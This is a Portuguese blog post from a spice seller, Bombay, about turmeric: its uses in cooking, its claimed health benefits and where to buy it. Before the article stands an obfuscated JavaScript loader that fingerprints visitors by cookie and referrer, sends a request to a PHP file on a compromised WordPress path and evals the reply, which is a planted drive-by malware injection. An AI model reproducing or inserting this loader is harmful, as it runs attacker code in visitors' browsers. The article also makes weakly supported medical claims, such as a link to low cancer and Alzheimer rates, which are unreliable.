;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//blog.bombayhs.com.br/wp-content/cache/asset-cleanup/css/item/inline/inline.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Você já se perguntou o que é cúrcuma ou açafrão da terra? como usá-la e quais são seus benefícios?

Se ainda não, estamos aqui para trazer algumas informações que vão ser muito úteis para você!

Em primeiro lugar, aprender a usar especiarias faz muita diferença para quem gosta de cozinhar por prazer ou para manter a saúde em dia – e se der para combinar os dois, melhor ainda.

Por isso, vamos falar de como usar a cúrcuma, um tempero que nunca esteve tão em alta e faz muito bem!

Confira neste post o que é a cúrcuma, quais os benefícios e em que tipo de receitas pode ser usada.

O que é cúrcuma?

Cúrcuma em pó ou açafrão-da-terra é um tempero originário da Índia, muito conhecido pelos seus benefícios para a saúde do organismo.

Não é apenas nos pratos mais elaborados e perfumados que a cúrcuma reina. Ela é muitas em uma só.

Esse pozinho de cor igualável é aromatizante, medicamento fitoterápico, tempero, conservante, corante e até cosmético.

Seu fruto é bastante semelhante com o gengibre e suas folhas são bastante perfumadas.

Da mesma forma que o gengibre, ela pode ser consumida seca, triturada ou em pó, como normalmente a vemos; e de forma fresca, que seria ralada ou em pedaços.

Além disso, outra maneira muito consumida é através de chás ou até mesmo do famoso shot matinal, o Golden Milk!

A título de curiosidade: a Índia é a maior consumidora e produtora de cúrcuma, seja como corante natural ou nas masalas – a mistura de especiarias.

Outro uso facilmente encontrado nos dias atuais são as cápsulas de cúrcuma e  pessoas utilizando extrato de cúrcuma.

Esse hábito pode ser um dos responsáveis pelos baixos índices de câncer e Alzheimer entre a população.

Cúrcuma: o que é, como usar e quais são os benefícios para a saúde

Comprar Açafrão da Terra Bombay

Quais os benefícios da cúrcuma em pó?

A cúrcuma vem de um ativo vegetal e vamos te contar de maneira bem simples o que você ganha ao consumi-la em seu dia-a-dia.

Uma dose diária de 5 gramas (uma colher de chá) é suficiente para você já começar a sentir os efeitos benéficos desse ingrediente.

Entre os principais destacamos:

– Equilíbrio das funções do intestino.

– Poderoso agente anti-inflamatório.,

– Sensação de bem-estar.

– Disposição e energia.

Estudiosos apontam que a curcumina – substância encontrada no pó extraído da raiz da cúrcuma, que dá a cor amarelo alaranjada – pode ajudar a prevenir ou combater o câncer de estômago.

Um estudo feito por pesquisadores da Universidade Federal de São Paulo (UNIFESP) e a Universidade Federal do Pará (UFPA) apoiado pela Agência FAPESP apontou os efeitos terapêuticos desses pigmentos e outros compostos no tratamento do tumor.

É incrível o que um “simples tempero” pode fazer em nosso organismo, não é?

É claro que sozinha a cúrcuma não é “a salvadora”, mas é uma importante aliada para quem busca equilíbrio natural na vida.

Conheça o gengibre em pó da Bombay.

Para que serve e como usar?

Como mencionado anteriormente, a cúrcuma possui diversos benefícios e é muito versátil podendo se utilizada em diversos pratos.

Utilize essa deliciosa especiaria em tortas, sopas, carnes, hambúrgueres, panquecas, saladas, nos pães, no arroz, no strogonoff, no purê, além de diversos tipos de risoto.

Assim como para fazer o famoso shot matinal do Golden Milk, a deliciosa bebida da Ayurveda para fortalecer a imunidade.

Juntamente com outras especiarias, combine ela e crie sua própria massala.

Crie risotos coloridos e cheios de sabor usando cúrcuma combinada com legumes, verduras e no preparo de currys.

Por fim, dê cor e sabor à carne de frango para marinar a carne, junto a outros temperos.

Receitas

Onde comprar cúrcuma (açafrão-da-terra)?

Na Bombay você encontra todas as ervas e especiarias, na melhor qualidade do mercado e em diversas embalagens.

Para comprar e conhecer mais sobre o açafrão da terra, basta acessar o link abaixo e se deliciar com diversas receitas!

E não deixe de olhar o site da Bombay, você pode encontrar os melhores temperos para deixar suas receitas ainda melhores!

Para mais receitas e dicas, acompanhe nosso blog e outras receitas e dicas com o açafrão da terra:

Um comentário

Deixe uma Resposta